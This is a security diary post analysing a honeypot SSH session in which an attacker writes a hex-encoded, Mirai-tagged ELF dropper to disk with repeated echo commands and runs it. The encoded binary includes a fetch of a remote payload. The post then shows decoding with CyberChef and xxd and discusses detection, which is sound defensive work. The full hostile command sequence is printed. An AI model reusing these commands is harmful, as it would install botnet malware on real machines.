Hiding in Hex

Published: 2023-10-18. Last Updated: 2023-10-18 02:07:28 UTC
by Jesse La Grew (Version: 1)
0 comment(s)

There are a variety of attacks seen from DShield honeypots [1]. Most of the time these commands are human readable. but every now and again they are obfuscated using base64 or hex encoding. A quick look for commands containing the "/x" delimiter give a lot of results encoded in hexadecimal. 



Figure 1: Example of hex obfuscated data from cowrieprocessor [2] SQLite file. 

 

The session highlighted in the example above shows a command that looks like hex characters. Looking at a similar session, the hex encoding was used multiple times to iteratively write a malware file. 

                       Session  e7333c3c2f12                                      
                      Protocol  ssh                                               
                      Username  Mroot                                             
                      Password  cat1029                                           
                     Timestamp  2022-07-16T07:59:34.450260Z                       
             Source IP Address  194.31.98.244                                     
               URLhaus IP Tags  intel, elf, mirai, 32                             
                        ASNAME  AS-SERVERION Serverion B.V.                       
                     ASCOUNTRY  NL                                                
            Total Commands Run  30    

////////////////// COMMANDS ATTEMPTED //////////////////

# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient
# echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\xd7\x82\x04\x08\x34\x00\x00\x00\x1c\x04\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xfe\x03\x00\x00\xfe\x03\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x94\x04\x08\x00\x94\x04\x08\x00\x00\x00\x00\x58\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x51\xe5\x74\x64\x00\x00\x00\x00\x00\x00\x00\x00' > ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x89\xe5\x0f\xb6\x4d\x0c\x0f\xb6\x45\x14\xc1\xe1\x10\x09\xc1\x0f\xb6\x45\x08\xc1\xe0\x18\x09\xc1\x0f\xb6\x45\x10\x5d\xc1\xe0\x08\x09\xc1\x89\xca\xc1\xe2\x18\xc1\xe0\x08\x09\xd0\x89\xca\x81\xe2\x00\x00\xff\x00\xc1\xea\x08\x09\xd0\xc1\xe9\x18\x09\xc8\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x01\xe8\xf0\x01\x00\x00\x83\xc4\x10\xc9\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x06' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\xe8\xdb\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x05\xe8\xc3\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x03\x6a\x66\xe8\x9c\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x04\xe8\x84\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x03\xe8\x6c\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x01\x6a\x66\xe8\x45\x01\x00\x00\xc9\xc3\x55\xba\xd2\x83\x04\x08\x89\xe5\x57\x56\x53\x31\xdb\x81\xec\xac\x00\x00\x00\xeb\x01\x43\x8a\x02\x42\x84\xc0\x75\xf8\x68\xf4\x00\x00\x00\x6a\x62\x6a\x1f\x68\xc2\x00\x00\x00\x66\xc7\x45\xe0\x02\x00\x66\xc7\x45\xe2\x00\x50\xe8\xc7\xfe\xff\xff\x83\xc4\x0c\x68\xff\x01\x00\x00\x68\x41\x02\x00\x00\x68\xd6\x83\x04\x08\x89\x45\xe4\xe8\x14\xff\xff\xff\x83\xc4\x0c\x6a\x00\x6a\x01\x6a\x02\x89\xc7\xe8\x73' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\xff\xff\xff\x83\xc4\x10\x83\xf8\xff\x89\xc6\x74\x05\x83\xff\xff\x75\x0d\x83\xec\x0c\x6a\x01\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x50\x6a\x10\x8d\x45\xe0\x50\x56\xe8\xf3\xfe\xff\xff\x83\xc4\x10\x85\xc0\x79\x0e\x83\xec\x0c\xf7\xd8\x50\xe8\xa2\xfe\xff\xff\x83\xc4\x10\x50\x8d\x43\x1a\x31\xdb\x50\x68\xe0\x83\x04\x08\x56\xe8\xf3\xfe\xff\xff\x83\xc4\x10\x50\x6a\x01\x8d\x45\xf3\x50\x56\xe8\xfb\xfe\xff\xff\x83\xc4\x10\x48\x74\x0d\x83\xec\x0c\x6a\x04\xe8\x6d\xfe\xff\xff\x83\xc4\x10\x0f\xbe\x45\xf3\xc1\xe3\x08\x09\xc3\x81' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\xfb\x0a\x0d\x0a\x0d\x75\xcf\x8d\x9d\x60\xff\xff\xff\x51\x68\x80\x00\x00\x00\x53\x56\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x85\xc0\x7e\x0e\x52\x50\x53\x57\xe8\x9c\xfe\xff\xff\x83\xc4\x10\xeb\xde\x83\xec\x0c\x56\xe8\x3d\xfe\xff\xff\x89\x3c\x24\xe8\x35\xfe\xff\xff\xc7\x04\x24\x05\x00\x00\x00\xe8\x14\xfe\xff\xff\x83\xc4\x10\x8d\x65\xf4\x5b\x5e\x5f\x5d\xc3\x55\x89\xe5\x5d\xe9\xbd\xfe\xff\xff\x57\x56\x53\x83\xec\x10\x8d\x44\x24\x3c\x8b\x54\x24\x24\x89\x44\x24\x0c\x8b\x44\x24\x34\x8d\x5c\x24\x04\x8b\x4c\x24\x28\x8b\x7c' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x24\x2c\x8b\x74\x24\x30\x89\x44\x24\x04\x8b\x44\x24\x38\x89\x44\x24\x08\x8b\x44\x24\x20\x53\xe8\x45\x00\x00\x00\x83\xc4\x04\x83\xec\x0c\x50\xe8\x78\x00\x00\x00\x83\xc4\x20\x5b\x5e\x5f\xc3\x90\x57\x53\x89\xd3\x89\xfa\x8b\x7c\x24\x0c\x50\xe8\x06\x00\x00\x00\x89\xda\x5b\x5b\x5f\xc3\x8b\x04\x24\x05\x14\x11\x00\x00\x8b\x00\x85\xc0\x74\x06\x50\x8b\x44\x24\x08\xc3\x8b\x44\x24\x04\xcd\x80\xc3\x55\x50\x8b\x6c\x24\x0c\x8b\x45\x00\x8b\x6d\x04\x50\x8b\x44\x24\x04\xe8\xb9\xff\xff\xff\x5d\x5d\x5d\xc3\x8d\x44\x24\x18\x56' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x57\x50\x8b\x44\x24\x10\x8b\x54\x24\x14\x8b\x4c\x24\x18\x8b\x7c\x24\x1c\x8b\x74\x24\x20\xe8\xc6\xff\xff\xff\x5f\x5f\x5e\xc3\x90\x53\x83\xec\x08\x8b\x5c\x24\x10\x81\xfb\x00\xf0\xff\xff\x89\xd8\x77\x05\x83\xc4\x08\x5b\xc3\xe8\x0c\x00\x00\x00\xf7\xdb\x89\x18\xb8\xff\xff\xff\xff\xeb\xeb\x90\x65\xa1\x00\x00\x00\x00\x83\xc0\x28\xc3\x78\x38\x36\x00\x6e\x74\x70\x63\x6c\x69\x65\x6e\x74\x00\x47\x45\x54\x20\x2f\x73\x73\x68\x2f\x6e\x65\x77\x2f\x78\x38\x36\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x2e' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xa0\x80\x04\x08\xa0\x00\x00\x00\x32\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\xd2\x83\x04\x08\xd2\x03\x00\x00' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\x00\x94\x04\x08\x00\x04\x00\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# ./ddnsclient; chmod 777 ntpclient; ./ntpclient scan.x86
# kill %%1
# echo A

 

These are a variety of ways to decode this information and I decided to use Cyberchef [3] to recreate it. 


Figure 2: Cyberchef decoding of malware file

 

The recipe can also be added to so that the SHA-256 hash can be looked up using other tools such as VirusTotal [4]. 


Figure 3: Getting SHA-256 hash of decoded file in Cyberchef

 

Another way to decode this can be done from the command line. 

echo \x50\x41\x54\x48\x5f\x44\x4f\x4e\x45 | xxd -r -p
PATH_DONE

 

In this example, no file creation was logged in cowrie. This means the SHA-256 hash of the file wasn't available and there was no other obvious information that malware was included in this attack. Consider this kind of obfuscation and how it can be detected using monitoring tools. The file creation itself may have been detected and flagged by antivirus software, but this kind of obfuscation could have been captured and analyzed before the file was created. 

 

[1] https://isc.sans.edu/honeypot.html
[2] https://github.com/jslagrew/cowrieprocessor
[3] https://gchq.github.io/CyberChef
[4] https://www.virustotal.com/gui/file/7bcea3cb620f907cd44d0995c2c4400f396369636c1c3a5c60c7f80a1dfd05f9/detection

--
Jesse La Grew
Handler

0 comment(s)
ISC Stormcast For Wednesday, October 18th, 2023 https://isc.sans.edu/podcastdetail/8706

Comments


Diary Archives